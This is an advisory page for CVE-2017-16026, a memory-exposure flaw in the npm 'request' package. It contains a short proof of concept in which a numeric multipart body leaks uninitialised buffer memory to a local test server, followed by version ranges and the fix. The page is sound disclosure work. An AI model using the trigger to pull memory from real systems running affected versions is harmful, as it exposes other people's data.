Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTd4ZnAtOWM1NS01dnFq
Remote Memory Exposure in request
Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.
Proof of Concept
var request = require('request');
var http = require('http');
var serveFunction = function (req, res){
req.on('data', function (data) {
console.log(data)
});
res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);
request({
method: "POST",
uri: 'http://localhost:8000',
multipart: [{body:500}]
},function(err,res,body){});
Recommendation
Update to version 2.68.0 or later
Permalink: https://github.com/advisories/GHSA-7xfp-9c55-5vqjJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTd4ZnAtOWM1NS01dnFq
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 6 years ago
Updated: about 1 year ago
CVSS Score: 5.9
CVSS vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Identifiers: GHSA-7xfp-9c55-5vqj, CVE-2017-16026
References:
- https://nvd.nist.gov/vuln/detail/CVE-2017-16026
- https://github.com/request/request/issues/1904
- https://github.com/request/request/pull/2018
- https://github.com/request/request/pull/2022
- https://github.com/request/request/commit/29d81814bc16bc79cb112b4face8be6fc00061dd
- https://github.com/advisories/GHSA-7xfp-9c55-5vqj
Blast Radius: 35.0
Affected Packages
npm:request
Dependent packages: 58,231Dependent repositories: 847,768
Downloads: 73,701,017 last month
Affected Version Ranges: >= 2.2.6, < 2.47.0, >= 2.49.0, < 2.68.0
Fixed in: 2.68.0, 2.68.0
All affected versions: 2.2.6, 2.2.9, 2.9.0, 2.9.1, 2.9.2, 2.9.3, 2.9.100, 2.9.150, 2.9.151, 2.9.152, 2.9.153, 2.9.200, 2.9.201, 2.9.202, 2.9.203, 2.10.0, 2.11.0, 2.11.1, 2.11.2, 2.11.3, 2.11.4, 2.12.0, 2.14.0, 2.16.0, 2.16.2, 2.16.4, 2.16.6, 2.18.0, 2.19.0, 2.20.0, 2.21.0, 2.22.0, 2.23.0, 2.24.0, 2.25.0, 2.26.0, 2.27.0, 2.28.0, 2.29.0, 2.30.0, 2.31.0, 2.32.0, 2.33.0, 2.34.0, 2.35.0, 2.36.0, 2.37.0, 2.38.0, 2.39.0, 2.40.0, 2.41.0, 2.42.0, 2.43.0, 2.44.0, 2.45.0, 2.46.0, 2.49.0, 2.50.0, 2.51.0, 2.52.0, 2.53.0, 2.54.0, 2.55.0, 2.56.0, 2.57.0, 2.58.0, 2.59.0, 2.60.0, 2.61.0, 2.62.0, 2.63.0, 2.64.0, 2.65.0, 2.66.0, 2.67.0
All unaffected versions: 0.8.3, 0.9.0, 0.9.1, 0.9.5, 0.10.0, 1.0.0, 1.1.0, 1.1.1, 1.2.0, 1.9.0, 1.9.1, 1.9.2, 1.9.3, 1.9.5, 1.9.7, 1.9.8, 1.9.9, 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1, 2.2.0, 2.2.5, 2.47.0, 2.48.0, 2.68.0, 2.69.0, 2.70.0, 2.71.0, 2.72.0, 2.73.0, 2.74.0, 2.75.0, 2.76.0, 2.77.0, 2.78.0, 2.79.0, 2.80.0, 2.81.0, 2.82.0, 2.83.0, 2.84.0, 2.85.0, 2.86.0, 2.87.0, 2.88.0, 2.88.2